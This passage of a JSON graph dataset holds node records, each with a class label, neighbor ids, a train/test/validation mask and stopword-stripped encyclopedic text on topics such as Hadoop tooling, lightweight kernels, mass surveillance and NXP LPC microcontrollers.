    "text": "Jumbune:jumbune jumbune juhm-b-yoon open-source multi-module framework intended hadoop mapreduce developers cluster administrators designed monitor profile analyse validate hadoop job cluster jumbune provides complete view whole hadoop cluster jobs one go framework comprises various modules helps admins monitor cluster node system-level fine grained statistics option mark frequently monitored stats favorites fetch refreshed results specified interval time selection trends specific stats also available simple easy utility helps mapreduce developers find discrepancies errors hdfs data user may check data violations various categories like data type null values regular expression values provides developers code level control flow statistics mapreduce job user may apply regex validations user defined validation classes per validations applied jumbune flow debugger checks flow key value data mapper reducer respectively enables developers understand resources creating bottleneck mapreduce phases thatare consuming time estimated requires optimization achieve efficient job performance",
    "neighbors": [
      7983,
      5677,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1166,
    "label": 7,
    "text": "Browser-based_computing:browser-based computing browser-based computing term denoting use web browsers perform computing tasks opportunities computing web noted far back 1997 computing web described 2000 applications include distributed computing web workers illustrated crowdprocess use browser stack qmachine embedding web applications semantic hypermedia components signaling server peer-to-peer networks set via webrtc browser-based computing complements cloud computing reduce server-side computational load often using cloud-hosted restful web services",
    "neighbors": [
      8640,
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 1167,
    "label": 8,
    "text": "Xenu's_Link_Sleuth:xenu link sleuth xenu xenu link sleuth computer program checks websites broken hyperlinks written tilman hausherr proprietary software available charge program named xenu galactic ruler scientology scripture link sleuth runs microsoft windows link verification performed links appear codice_1 tags well images frames plug-ins backgrounds local image maps style sheets scripts java applets program follows links pages checks links pages also possible check entire site broken links one session xenu displays continuously updated list urls sorted according different criteria program uses simple no-frills user-interface help users understand certain web sites structured program support ssl web sites xenu link sleuth software called fastest link-checking software pc magazine amazingly fast accurate university wyoming newsletter software used testing tool usability study grand valley state university xenu link sleuth also cited rossett astd e-learning handbook zhong intelligent technologies information analysis gerrard risk-based e-business testing reynolds complete e-commerce book slocombe max hits websites work george abc seo well german books italian books",
    "neighbors": [
      1723,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1168,
    "label": 2,
    "text": "Lightweight_Kernel_Operating_System:lightweight kernel operating system lightweight kernel lwk operating system one used large computer many processor cores termed parallel computer massively parallel high-performance computing hpc system particularly sensitive operating system overhead traditional multi-purpose operating systems designed support wide range usage models requirements support range needs large number system processes provided often inter-dependent computing overhead processes leads unpredictable amount processor time available parallel application common parallel programming model referred bulk synchronous parallel model often employs message passing interface mpi communication synchronization events made specific points application code one processor takes longer reach point processors everyone must wait overall finish time increased unpredictable operating system overhead one significant reason processor might take longer reach synchronization point others custom lightweight kernel operating systems currently used fastest computers world help alleviate problem ibm blue gene line supercomputers runs various versions cnk operating system cray xt4 cray xt5 supercomputers run compute node linux sandia national laboratories almost two-decade commitment lightweight kernels high-end hpc systems sandia university new mexico researchers began work sunmos intel paragon early 1990s operating system evolved puma cougar catamount operating systems deployed asci red red storm sandia continues work lwks new r effort called kitten design goals operating systems lwk implementations vary strive provide applications predictable maximum access central processing unit cpu system resources achieve simplified algorithms scheduling memory management usually included system services e.g. daemons limited absolute minimum available services job launch constructed hierarchical fashion ensure scalability thousands nodes networking protocols communication nodes system also carefully selected implemented ensure scalability one example portals network programming application programming interface api lightweight kernel operating systems assume access small set nodes running full-service operating systems offload necessary services login access compiling environments batch job submission file i/o restricting services absolutely necessary streamlining provided overhead sometimes called noise lightweight operating system minimized allows significant predictable amount processor cycles given parallel application since application make consistent progress processor reach synchronization points faster ideally time lost wait time reduced",
    "neighbors": [
      1795,
      6179,
      1480,
      7497,
      10411,
      1933,
      7983,
      1776,
      8242,
      7382,
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 1169,
    "label": 1,
    "text": "Mass_surveillance:mass surveillance mass surveillance intricate surveillance entire substantial fraction population order monitor group citizens surveillance often carried local federal governments governmental organisations organizations like nsa fbi may also carried corporations either behalf governments initiative depending nation laws judicial systems legality permission required engage mass surveillance varies single indicative distinguishing trait totalitarian regimes also often distinguished targeted surveillance mass surveillance often cited necessary fight terrorism prevent crime social unrest protect national security control population conversely mass surveillance equally often criticized violating privacy rights limiting civil political rights freedoms illegal legal constitutional systems another criticism increasing mass surveillance could lead development surveillance state electronic police state civil liberties infringed political dissent undermined cointelpro-like programs state could referred totalitarian state 2013 practice mass surveillance world governments called question edward snowden ‘ 2013 global surveillance disclosure reporting based documents snowden leaked various media outlets triggered debate civil liberties right privacy digital age mass surveillance considered global issue privacy international 2007 survey covering 47 countries indicated increase surveillance decline performance privacy safeguards compared previous year balancing factors eight countries rated 'endemic surveillance societies eight china malaysia russia scored lowest followed jointly singapore united kingdom jointly taiwan thailand united states best ranking given greece judged 'adequate safeguards abuse many countries throughout world already adding thousands surveillance cameras urban suburban even rural areas example september 2007 american civil liberties union aclu stated danger tipping genuine surveillance society completely alien american values potential dark future every move every transaction every communication recorded compiled stored away ready examined used us authorities whenever want 12 march 2013 reporters without borders published special report internet surveillance report included list state enemies internet countries whose governments involved active intrusive surveillance news providers resulting grave violations freedom information human rights five countries placed initial list bahrain china iran syria vietnam bahrain one five countries reporters without borders march 2013 list state enemies internet countries whose governments involved active intrusive surveillance news providers resulting grave violations freedom information human rights level internet filtering surveillance bahrain one highest world royal family represented areas internet management sophisticated tools disposal spying subjects online activities dissidents news providers closely monitored surveillance increasing china one five countries reporters without borders march 2013 list state enemies internet countries whose governments involved active intrusive surveillance news providers resulting grave violations freedom information human rights internet access china owned controlled state communist party many foreign journalists china said take granted telephones tapped email monitored tools put place filter monitor internet collectively known great firewall china besides usual routing regulations allow access ip address particular domain name blocked great firewall makes large-scale use deep packet inspection dpi technology monitor block access based keyword detection great firewall ability dynamically block encrypted connections one country main isps china unicom automatically cuts connection soon used transmit encrypted content monitoring system developed china confined great firewall monitoring also built social networks chat services voip private companies directly responsible chinese authorities surveillance networks ensure banned messages circulated qq application owned firm tencent allows authorities monitor detail exchanges internet users seeking certain keywords expressions author message identified user number qq application effectively giant trojan horse since march 2012 new legislation requires new users micro-blogging sites register using name telephone number skype one world popular internet telephone platforms closely monitored skype services china available local partner tom media group chinese-language version skype known tom-skype slightly different downloadable versions countries report opennet initiative asia says everyday conversations captured servers interception storage conversation may triggered sender recipient name keywords occur conversation 30 january new york times reported target attacks chinese government first breach took place 13 september 2012 newspaper preparing publish article fortune amassed family outgoing prime minister wen jiabao newspaper said purpose attacks identify sources supplied newspaper information corruption among prime minister entourage wall street journal cnn also said targets cyber attacks china february twitter disclosed accounts 250,000 subscribers victims attacks china similar carried new york times mandiant company engaged nyt secure network identified source attacks group hackers called advanced persistent threat 1 unit people liberation army operating 12-story building suburbs shanghai hundreds possibly thousands staff direct support chinese government newest form mass surveillance china social credit system citizens businesses given deducted good behavior points depending choices digital revolution one world biggest mass surveillance operations carried stasi secret police former east germany time state collapsed 1989 stasi built estimated civilian network 300,000 informants approximately one fifty population monitored even minute hints political dissent among citizens many west germans visiting friends family east germany also subject stasi spying well many high-ranking west german politicians persons public eye east german citizens well aware government spying led culture mistrust touchy political issues discussed comfort four walls closest friends family members widely maintaining façade unquestioning followership public right privacy highly developed area law europe data protection directive regulates processing personal data within european union comparison us data protection law comparable instead us regulates data protection sectoral basis since early 2012 european union working general data protection regulation replace data protection directive harmonise data protection privacy law 20 october 2013 committee european parliament backed measure enacted could require american companies seek clearance european officials complying united states warrants seeking private data vote part efforts europe shield citizens online surveillance wake revelations far-reaching spying program u.s. national security agency european union justice rights commissioner viviane reding said question arisen whether large-scale collection processing personal information us surveillance programmes necessary proportionate meet interests national security eu also asking us changes us legislation match legal redress offered europe american citizens europe go courts feel rights infringed europeans without right residence america eu us arrangement implement international safe harbor privacy principles struck european court justice new framework transatlantic data flows called eu-us privacy shield adopted july 2016 april 2014 european court justice declared invalid eu data retention directive court said violates two basic rights respect private life protection personal data legislative body european union passed data retention directive 15 december 2005 requires telecommunication operators retain metadata telephone internet telecommunication services periods less six months two years date communication determined eu member state upon request make data available various governmental bodies access information limited investigation serious crimes warrant required access undertaken seventh framework programme research technological development fp7 science society multidisciplinary mission oriented mass surveillance activities example indect hide funded european commission association industrial partners indect project intelligent information system supporting observation searching detection security citizens urban environment develops intelligent urban environment observation system register exchange operational data automatic detection recognition intelligent processing information abnormal behaviour violence main expected results indect project hide homeland security biometric identification personal detection ethics research project funded european commission within scope seventh rtd framework programme fp7 consortium coordinated emilio mordini explored ethical privacy implications biometrics personal detection technologies focusing continuum personal detection authentication identification mass surveillance 2002 german citizens tipped wiretapping software error led phone number allocated german secret service listed mobile telephone bills indian parliament passed information technology act 2008 debate giving government fiat power tap communications without court order warrant section 69 act states section 69 empowers central government/state government/ authorized agency intercept monitor decrypt information generated transmitted received stored computer resource necessary expedient interest sovereignty integrity india defence india security state friendly relations foreign states public order preventing incitement commission cognizable offence investigation offence india setting national intelligence grid called natgrid would fully set may 2011 individual data ranging land records internet logs air rail pnr phone records gun records driving license property records insurance income tax records would available real time oversight uid unique identification authority india given every indian february 2011 government would able track people real time national population registry citizens established 2011 census fingerprints iris scans would taken along gps records household per initial plan access combined data given 11 agencies including research analysis wing intelligence bureau enforcement directorate national investigation agency central bureau investigation directorate revenue intelligence narcotics control bureau several states within india already installed cctv surveillance systems face matching capabilities using biometrics aadhaar andhra pradesh telangana using information linked aadhaar across different agencies create 360-degree profile person calling integration information hub states planning follow model iran one five countries reporters without borders march 2013 list state enemies internet countries whose governments involved naturally active efforts news providers government runs controls almost country institutions regulating managing legislating telecommunications supreme council cyberspace headed president ahmadinejad established march 2012 determines digital policy construction parallel iranian internet high connection speed fully monitored censored almost complete tools used iranian authorities monitor control internet include data interception tools capable deep packet inspection interception products leading chinese companies zte huawei use products provided huawei mobin net leading national provider mobile broadband used analyze email content track browsing history block access sites products zta sold telecommunication company iran tci offer similar services plus possibility monitoring mobile network european companies source spying data analysis tools products designed ericsson nokia siemens networks later trovicor use companies sold sms interception user location products mobile communication company iran irancell iran two biggest mobile phone companies 2009 used identify iranian citizens post-election uprising 2009 use israeli surveillance devices also detected iran network traffic management surveillance device netenforcer provided israel denmark resold iran similarly us equipment found way iran via chinese company zte july 2018 malaysian police announced creation malaysian internet crime children investigation unit micac equipped real-time mass internet surveillance software developed united states tasked monitoring malaysian internet users focus pornography child pornography system creates data library users includes details ip addresses websites locations duration frequency use files uploaded downloaded struggling drug trafficking criminal groups decades mexico strengthening military mass surveillance approximately half population mexico support democracy form government believe authoritarian system better social matters solved relevance political beliefs may make easier mass surveillance take spread within country necessarily mean end democratic institutions whole—such free elections permanence critical mass media—but means strengthening mechanisms exercising power exclude dialogue transparency social agreement developing intelligence agencies mexico radar means security according 2004 report government netherlands carries clandestine wire-taps intercepts country per capita world dutch military intelligence service mivd operates satellite ground station intercept foreign satellite links also facility eavesdrop foreign high-frequency radio traffic attained nickname ‘ surveillance state ’ north korea government complete control forms telecommunications internet routine sent prison camp communicating outside world government enforces restrictions around types appliances north koreans may home case radio tv sets pick signals nearby south korea china russia attempt mask way government actively spies citizens north korea increasing number citizens smartphones however devices heavily controlled used censor observe everything north koreans phones reuters reported 2015 koryolink north korea official mobile phone network around 3 million subscribers country 24 million obviously order digital data draw citizens must access phones things online sorm sorm-2 laws enable complete monitoring communication electronic traditional eight state agencies without warrant laws seem conflict article 23 constitution russia states 2015 european court human rights ruled legislation violated article 8 european convention human rights zakharov v. russia yarovaya law required storage unconditional access private communication data law enforcement singapore known city sensors singapore surveillance structure spreads widely closed-circuit television public areas even around neighbourhood internet monitoring/ traffic monitoring use surveillance metadata government initiatives singapore sim card registration mandatory even prepaid card singapore government rights access communication data singapore largest telecompany singtel close relations government singapore laws broadly phrased allow government obtain sensitive data text-messages email call logs web surfing history people without need court permission installation mass surveillance cameras singapore effort act deterrence terror attacks also public security loan sharks illegal parking part singapore smart nation initiative build network sensors collect connect data city life including citizen movement singapore government rolled 1000 sensors ranging computer chips surveillance cameras track almost everything singapore air quality public safety 2014 2016 bid increase security singapore police force installed 62,000 police cameras 10,000 housing development board hdb blocks covering lifts multi-storey car parks rising security concerns number cctv cameras public areas monitoring public transport system commercial/ government buildings singapore set increase 2018 singapore government would rolling new advanced surveillance systems starting singapore maritime borders new panoramic electro-optic sensors put place north south coasts monitoring 360-degree view area tethered unmanned aerial vehicle uav also operational used search rescue operations including hostage situations public order incidents according 2017 report privacy international spain may part group 21 european countries withholding information also known data retention 2014 many defense lawyers tried overturn multiple cases used mass storage evidence convict according european agency fundamental rights prior 2009 national defence radio establishment fra limited wireless signals intelligence sigint although left largely unregulated december 2009 new legislation went effect allowing fra monitor cable bound signals passing swedish border communications service providers legally required confidentiality transfer cable communications crossing swedish borders specific interaction points data may accessed court order fra contested since change legislation mainly public perception change would enable mass surveillance fra categorically deny allegation allowed initialize surveillance direct access communication lines sigint authorized special court meet set narrow requirements something minister defence sten tolgfors quoted saying render debate mass surveillance invalid due architecture internet backbones nordic area large portion norwegian finnish traffic also affected swedish wiretapping syria one five countries reporters without borders march 2013 list state enemies internet countries whose governments involved active intrusive surveillance news providers resulting grave violations freedom information human rights syria stepped web censorship cyber-monitoring country civil war intensified least 13 blue coat proxy servers use skype calls intercepted social engineering techniques phishing malware attacks use failed coup attempt june 15 2016 led authoritarian shift uses mass surveillance suppress opposite views digital surveillance part everyday life due box government puts turkish citizens increasingly difficult release academic knowledge beyond turkish government wants released digital physical strong hold knowledge goes regime today surveillance academicians goes along state oppression turkey hard say happen next years turkey become increasingly authoritarian centralization state power along digitalization expands scope state surveillance digitalization centralization state power closely related regime power becomes prominent conjuncture national security terrorism turkey main explanations world topic although clearly happening according report human rights joint platform published february 23 2017 nine months period state emergency number dismissed academicians reached 4,811 increasing 7,619 addition academicians working universities closed failed coup attempt extended surveillance turkey helped control population massive scale state surveillance united kingdom formed part public consciousness since 19th century postal espionage crisis 1844 sparked first panic privacy citizens however 20th century electronic surveillance capabilities grew wartime signal intelligence pioneering code breaking 1946 government communications headquarters gchq formed united kingdom united states signed bilateral ukusa agreement 1948 later broadened include canada australia new zealand well cooperation several third-party nations became cornerstone western intelligence gathering special relationship uk usa growth internet development world wide web series media reports 2013 revealed recent programs techniques involving gchq tempora use capabilities controlled laws made uk parliament particular access content private messages interception communication must authorized warrant signed secretary state addition european union data privacy law applies uk law uk exhibits governance safeguards well use electronic surveillance investigatory powers tribunal judicial oversight body intelligence agencies ruled december 2014 legislative framework united kingdom breach european convention human rights however tribunal stated february 2015 one particular aspect data-sharing arrangement allowed uk intelligence services request data us surveillance programs prism upstream contravention human rights law prior two paragraphs additional information providing details procedures safeguards disclosed public december 2014 december 2014 ruling investigatory powers tribunal found legislative framework united kingdom permit mass surveillance gchq collects analyses data bulk practice mass surveillance report privacy security published intelligence security committee parliament also came view although found past shortcomings oversight said legal framework simplified improve transparency view supported independent reports interception communications commissioner however notable civil liberties groups continue express strong views contrary plan appeal ruling european court human rights others criticised viewpoints turn regulation investigatory powers act 2000 rip ripa significant piece legislation granted regulated powers public bodies carry surveillance investigation 2002 uk government announced plans extend regulation investigatory powers act least 28 government departments would given powers access metadata citizens web e-mail telephone fax records without warrant without subject knowledge protection freedoms act 2012 includes several provisions related controlling restricting collection storage retention use information government databases supported three major political parties uk parliament passed data retention investigatory powers act july 2014 ensure police security services retain existing powers access phone internet records superseded investigatory powers act 2016 comprehensive statute made public number previously secret powers equipment interference bulk retention metadata intelligence agency use bulk personal datasets enables government require internet service providers mobile phone companies maintain records content customers internet connections 12 months addition created new safeguards including requirement judges approve warrants authorised secretary state come force act informed two reports david anderson qc uk independent reviewer terrorism legislation question trust 2015 report bulk powers review 2016 contains detailed appraisal 60 case studies operational case powers often characterised mass surveillance may yet require amendment consequence legal cases brought court justice european union european court human rights many advanced nation-states implemented laws partially protect citizens unwarranted intrusion human rights act 1998 data protection act 1998 united kingdom laws require formal warrant private data may gathered government uk member european union participates programs subject eu policies directives surveillance vast majority video surveillance cameras uk operated government bodies private individuals companies especially monitor interiors shops businesses according 2011 freedom information act requests total number local government operated cctv cameras around 52,000 entirety uk prevalence video surveillance uk often overstated due unreliable estimates requoted example one report 2002 extrapolated small sample estimate number cameras uk 4.2 million 500,000 london reliable estimates put number private local government operated cameras united kingdom around 1.85 million 2011 historically mass surveillance used part wartime censorship control communications could damage war effort aid enemy example world wars every international telegram united states sent companies western union reviewed us military wars surveillance continued programs black chamber following world war project shamrock following world war ii cointelpro projects conducted u.s. federal bureau investigation fbi 1956 1971 targeted various subversive organizations including peaceful anti-war racial equality activists albert einstein martin luther king jr billions dollars per year spent agencies national security agency nsa federal bureau investigation fbi develop purchase implement operate systems carnivore echelon narusinsight intercept analyze immense amount data traverses internet telephone system every day since september 11 2001 terrorist attacks vast domestic intelligence apparatus built collect information using nsa fbi local police state homeland security offices military criminal investigators intelligence apparatus collects analyzes stores information millions american citizens many accused wrongdoing mail isolation control tracking program u.s postal service photographs exterior every piece paper mail processed united states — 160 billion pieces 2012 u.s. postmaster general stated system primarily used mail sorting images available possible use law enforcement agencies created 2001 following anthrax attacks killed five people sweeping expansion 100-year-old program called mail cover targets people suspected crimes fbi developed computer programs magic lantern cipav remotely install computer system order monitor person computer activity nsa gathering information financial records internet surfing habits monitoring e-mails also performed extensive analysis social networks myspace prism special source operation system legally immunized private companies cooperate voluntarily u.s. intelligence collection according register fisa amendments act 2008 specifically authorizes intelligence agencies monitor phone email communications u.s. citizens week without obtaining warrant one parties outside u.s. prism first publicly revealed 6 june 2013 classified documents program leaked washington post guardian american edward snowden communications assistance law enforcement act calea requires u.s. telecommunications internet service providers modify networks allow easy wiretapping telephone voip broadband internet traffic early 2006 usa today reported several major telephone companies providing telephone call records u.s. citizens national security agency nsa storing large database known nsa call database report came heels allegations u.s. government conducting electronic surveillance domestic telephone calls without warrants 2013 existence hemisphere project provides telephone call data federal agencies became publicly known traffic cameras meant help enforce traffic laws intersections may used law enforcement agencies purposes unrelated traffic violations cameras allow identification individuals inside vehicle license plate data collected time stamped cross reference data used police department homeland security funding networks surveillance cameras cities towns part efforts combat terrorism new york city police department infiltrated compiled dossiers protest groups 2004 republican national convention leading 1,800 arrests modern surveillance united states thought wartime effort snowden disclosed depth information national security agency june 2013 constant development improvements internet technology made easier mass surveillance take hold revelations allow critical commentators raise questions scrutinize implementation use abuse networking technologies devices software systems partake “ global surveillant assemblage ” bogard 2006 collier ong 2004 haggerty ericson 2000 murakami wood 2013 nsa collected millions verizon user telephone records 2013-2014 nsa also collected data google facebook program called 'prism journalists snowden published nearly 7,000 top-secret documents since yet information disclosed seems less 1 entire information access every individual private records seems directly contradict fourth amendment vietnam one five countries reporters without borders march 2013 list state enemies internet countries whose governments involved active intrusive surveillance news providers resulting grave violations freedom information human rights country 16 service providers directly indirectly controlled vietnamese communist party industry leader vietnam posts telecommunications group controls 74 per cent market state-owned viettel enterprise vietnamese armed forces fpt telecom private firm accountable party depends market leaders bandwidth service providers major instruments control surveillance bloggers monitored government frequently undergo man-in-the-middle attacks designed intercept data meant sent secure https sites allowing passwords communication intercepted according july 2012 freedom house report 91 percent survey respondents connected internet mobile devices government monitors conversations tracks calls activists reactionaries result digital revolution many aspects life captured stored digital form concern expressed governments may use information conduct mass surveillance populations commercial mass surveillance often makes use copyright laws user agreements obtain typically uninformed 'consent surveillance consumers use software related materials allows gathering information would technically illegal performed government agencies data often shared government agencies thereby practice defeating purpose privacy protections one common forms mass surveillance carried commercial organizations many people willing join supermarket grocery loyalty card programs trading personal information surveillance shopping habits exchange discount groceries although base prices might increased encourage participation program programs like google adsense opensocial increasing pool so-called web gadgets social gadgets google-hosted services many web sites internet effectively feeding user information sites visited users also social connections google facebook also keep information although acquisition limited page views within facebook data valuable authorities advertisers others interested profiling users trends web site marketing performance google facebook others increasingly becoming guarded data reach increases data becomes inclusive making valuable new features like geolocation give even increased admission monitoring capabilities large service providers like google also enabled track one physical movements users using mobile devices especially syncing without user interaction google gmail service increasingly employing features work stand-alone application also might activate web browser even active synchronizing feature mentioned google i/o 2009 developer conference showing upcoming html5 features google others actively defining promoting 2008 world economic forum davos google ceo eric schmidt said arrival truly mobile web offering new generation location-based advertising set unleash 'huge revolution mobile world congress barcelona 16 february 2010 google presented vision new business model mobile operators trying convince mobile operators embrace location-based services advertising google advertising provider would mean every mobile operator using location-based advertising service would revealing location mobile customers google organizations like electronic frontier foundation constantly informing users importance privacy considerations technologies like geolocation computer company microsoft patented 2011 product distribution system camera capture device monitors viewers consume product allowing provider take remedial action actual viewers match distribution license reporters without borders march 2013 special report internet surveillance contained list corporate enemies internet companies sell products liable used governments violate human rights freedom information five companies initial list amesys france blue coat systems u.s. gamma group uk germany hacking team italy trovicor germany list exhaustive likely expanded future surveillance state country government engages pervasive surveillance large numbers citizens visitors widespread surveillance usually justified necessary national security prevent crime acts terrorism may also used stifle criticism opposition government examples early surveillance states include former soviet union former east germany large network informers advanced technology base computing spy-camera technology states today technologies mass surveillance use databases pattern recognition software cross-correlate information obtained wire tapping including speech recognition telecommunications traffic analysis monitoring financial transactions automatic number plate recognition tracking position mobile telephones facial recognition systems like recognize people appearance gait dna profiling etc development smart cities seen increased adoption surveillance technologies governments although primary purpose surveillance cities use information communication technologies improve urban environment implementation technology number cities resulted increased efficiencies urban infrastructure well improved community participation sensors systems monitor smart city infrastructure operations activities aim help run efficiently example city could use less electricity traffic run smoothly fewer delays citizens use city safety hazards dealt faster citizen infractions rules prevented city infrastructure power distribution roads traffic lights example dynamically adjusted respond differing circumstances development smart city technology also led increase potential unwarranted intrusions privacy restrictions upon autonomy widespread incorporation information communication technologies within daily life urban residents results increases surveillance capacity states extent individuals may unaware information accessed access occurs purpose possible conditions could give rise development electronic police state shanghai amsterdam san jose dubai barcelona madrid stockholm new york cities use various techniques smart city technology electronic police state state government aggressively uses electronic technologies record collect store organize analyze search distribute information citizens electronic police states also engage mass government surveillance landline cellular telephone traffic mail email web surfing internet searches radio forms electronic communication well widespread use video surveillance information usually collected secret crucial elements politically based long government afford technology populace permit used electronic police state form continual use electronic mass surveillance result constant low-level fear within population lead self-censorship exerts powerful coercive force upon populace seventeen factors judging development electronic police state suggested electronic police state 2008 national rankings list includes factors apply forms police states use identity documents police enforcement go considerably beyond emphasize use technology gather process information collected concept monitored government collects large audience curious citizens mass surveillance prominently featured wide array books films media advances technology last century led possible social control internet conditions late capitalism many directors writers enthralled potential stories could come mass surveillance perhaps iconic example fictional mass surveillance george orwell 1949 novel nineteen eighty-four depicts dystopian surveillance state works focus mass surveillance",
    "neighbors": [
      2818,
      1930,
      5133,
      3599,
      3088,
      1169,
      3858,
      9233,
      10002,
      1941,
      1692,
      8735,
      5024,
      1189,
      1317,
      3111,
      3495,
      3880,
      8104,
      11046,
      9260,
      3629,
      1070,
      9901,
      11695,
      10417,
      3637,
      6455,
      10935,
      10557,
      11198,
      10303,
      3520,
      3521,
      197,
      3703,
      6344,
      4937,
      7759,
      208,
      4945,
      7887,
      11089,
      2901,
      7893,
      9558,
      1368,
      7515,
      8156,
      5085,
      8567,
      10207,
      7652,
      6885,
      615,
      488,
      6000,
      4595,
      8564,
      5749,
      7541,
      119,
      3192,
      4863
    ],
    "mask": "Train"
  },
  {
    "node_id": 1170,
    "label": 3,
    "text": "NXP_LPC:nxp lpc lpc family 32-bit microcontroller integrated circuits nxp semiconductors formerly philips semiconductors lpc chips grouped related series based around 32-bit arm processor core cortex-m4f cortex-m3 cortex-m0+ cortex-m0 internally microcontroller consists processor core static ram memory flash memory debugging interface various peripherals earliest lpc series based intel 8-bit 80c51 core february 2011 nxp shipped one billion arm processor-based chips recent lpc families based arm cores nxp semiconductors licenses arm holdings adds peripherals converting design silicon die nxp vendor shipping arm cortex-m core dual in-line package lpc810 dip8 0.3-inch width lpc1114 dip28 0.6-inch width following tables summarize nxp lpc microcontroller families lpc4xxx series based arm cortex-m4f core lpc4300 series two three arm cores one arm cortex-m4f one two arm cortex-m0 lpc4350 chips pin-compatible lpc1850 chips lpc4330-xplorer development board available nxp summary series lpc4000 series based single arm cortex-m4f processor core lpc408x chips pin-compatible lpc178x chips summary series lpc3xxx series based arm926ej-s core first 90 nm arm9 family lpc3200 series based arm926ej-s processor core lpc3100 series based arm926ej-s processor core lpc3154 used nxp implement lpc-link debugger lpcxpresso boards lpc3180 core operates 208 mhz features interfaces sdram usb 2.0 full-speed nand flash secure digital sd i²c lpc2000 series based 1.8-volt arm7tdmi-s core operating 80 mhz together variety peripherals including serial interfaces 10-bit adc/dac timers capture compare pwm usb interface external bus options flash memory ranges 32 kb 512 kb ram ranges 4 kb 96 kb nxp two related series without lpc name lh7 series based arm7tdmi-s arm720t cores lh7a series based arm9tdmi core lpc2900 series based arm968e-s processor core lpc2400 series based arm7tdmi-s processor core lpc2300 series based arm7tdmi-s processor core lpc2364/66/68 lpc2378 full-speed usb 2.0 devices 2 interfaces 10/100 ethernet mac lqfp100 lqfp144 packages multiple peripherals supported including 10-bit 8-channel adc 10-bit dac lpc2200 series based arm7tdmi-s processor core lpc2100 series based arm7tdmi-s processor core lpc2141 lpc2142 lpc2144 lpc2146 lpc2148 full-speed usb 2.0 devices lqfp64 packages multiple peripherals supported including one two 10-bit adcs optional 10-bit dac nxp lpc1000 family consists six series microcontrollers lpc1800 lpc1700 lpc1500 lpc1300 lpc1200 lpc1100 lpc1800 lpc1700 lpc1500 lpc1300 series based cortex-m3 arm processor core lpc1200 lpc1100 based cortex-m0 arm processor core nxp lpc1800-series based arm cortex-m3 core lpc1850 pin-compatible lpc4350 parts available packages tbga100 lqfp144 bga180 lqfp208 bga256 lpc4330-xplorer development board available nxp apple m7 m8 motion co-processor chips likely based lpc1800 series lpc18a1 lpc18b1 nxp lpc1700-series based arm cortex-m3 core lpc178x pin-compatible lpc408x parts available packages lqfp80 lqfp100 tfbga100 lqfp144 tfbga180 lqfp208 tfbga208 lpc1769-lpcxpresso development board available nxp mbed lpc1768 board also available emcrafts lpc-lnx-evb lpc1788 based board μclinux available nxp lpc1500-series based arm cortex-m3 core available packages lqfp48 lqfp64 lqfp100 lpc1549-lpcxpresso development board available nxp along motor control kit nxp lpc1300-series based arm cortex-m3 core available packages hvqfn33 lqfp48 lqfp64 lpc1343-lpcxpresso lpc1347-lpcxpresso development board available nxp nxp lpc1200-family based arm cortex-m0 core consists 2 series lpc1200 lpc12d00 available packages lqfp48 lqfp64 lqfp100 lpc1227-lpcxpresso development board available nxp nxp lpc1100-family based arm cortex-m0 core consists 8 series lpc1100 miniature lpc1100 x l lpc1100lv lpc11a00 lpc11c00 lpc11d00 lpc11e00 lpc11u00 lpc1100 series primarily targets ultra tiny footprint available package wlcsp16 2.17 mm x 2.32 mm lpc1104-lpcxpresso development board available nxp lpc1100 x l-series consists three subseries lpc111x lpc111xl lpc111xxl lpc111xl lpc111xxl include power profiles windowed watchdog timer configurable open-drain mode lpc1110xl adds non-maskable interrupt nmi 256-byte page flash erase function lpc1114-lpcxpresso lpc1115-lpcxpresso development board available nxp summary series lpc1100lv series primarily targets low operating voltage range 1.65 1.95 volt power i²c limited 400 khz available two power supply options 1.8 volt single power supply wlcsp25 hvqfn24 packages 1.8 volt core 3.3 volt io/analog dual power supply 5 volt tolerant i/o hvqfn33 package available packages wlcsp25 2.17 mm × 2.32 mm hvqfn24 hvqfn33 lpc11a00 series primarily targets analog features 10-bit adc 10-bit dac analog comparators analog voltage reference temperature sensor eeprom memory available packages wlcsp20 2.5 mm x 2.5 mm hvqfn33 5 mm x 5 mm hvqfn33 7 mm x 7 mm lqfp48 lpc11c00 series primarily targets bus features one mcan controller lpc11c22 lpc11c24 parts include on-chip high-speed transceiver available package lqfp48 lpc11c24-lpcxpresso development board available nxp lpc11d00 series primarily targets lcd display features 4 x 40 segment lcd driver available package lqfp100 lpc11e00 series primarily targets eeprom memory smart card features lpc11u00 series primarily targets usb features usb 2.0 full-speed controller first cortex-m0 integrated drivers rom series pin-compatible lpc134x series lpc11u14-lpcxpresso development board available nxp mbed lpc11u24 board also available nxp lpc800 microcontroller family based cortex-m0+ arm processor core unique features include pin switch matrix state configurable timer clockless wake-up controller single-cycle gpio dip8 package lpc812-lpcxpresso development board available nxp summary series lpc900 series legacy devices based 8-bit 80c51 processor core lpc700 series legacy devices based 8-bit 80c51 processor core lpcxpresso boards sold nxp provide quick easy way engineers evaluate microcontroller chips lpcxpresso boards jointly developed nxp code red technologies embedded artists lpcxpresso board following common features following lpcxpresso boards exist following mbed boards exist following baseboards compatible lpcxpresso mbed boards lpc microcontrollers rom'ed bootloader supports loading binary image flash memory using one peripherals varies family since lpc bootloaders support loading uart peripheral boards connect uart rs-232 usb-to-uart adapter ic thus universal method program lpc microcontrollers microcontrollers requires target board way enable/disable booting rom'ed bootloader i.e jumper switch button amount documentation arm chips daunting especially newcomers documentation microcontrollers past decades would easily inclusive single document chips evolved documentation grown total documentation especially hard grasp arm chips since consists documents ic manufacturer nxp semiconductors documents cpu core vendor arm holdings typical top-down documentation tree manufacturer website manufacturer marketing slides manufacturer datasheet exact physical chip manufacturer detailed reference manual describes common peripherals aspects physical chip family arm core generic user guide arm core technical reference manual arm architecture reference manual describes instruction set nxp additional documents evaluation board user manuals application notes getting started guides software library documents errata see external links section links official nxp arm documents",
    "neighbors": [
      7170,
      11395,
      3467,
      6797,
      398,
      6925,
      8720,
      10767,
      659,
      7445,
      7065,
      666,
      5786,
      4508,
      9371,
      4773,
      38,
      9638,
      682,
      4139,
      2862,
      11054,
      2224,
      11314,
      11447,
      9913,
      2874,
      8253,
      5823,
      6207,
      8383,
      7234,
      7235,
      9155,
      10945,
      9928,
      2635,
      5963,
      8268,
      9163,
      6607,
      7631,
      5457,
      2517,
      4821,
      9685,
      4569,
      2524,
      6495,
      1377,
      2788,
      869,
      7269,
      3050,
      9964,
      11374,
      1776,
      6001,
      7281,
      8058,
      8700,
      2814
    ],
    "mask": "Validation"
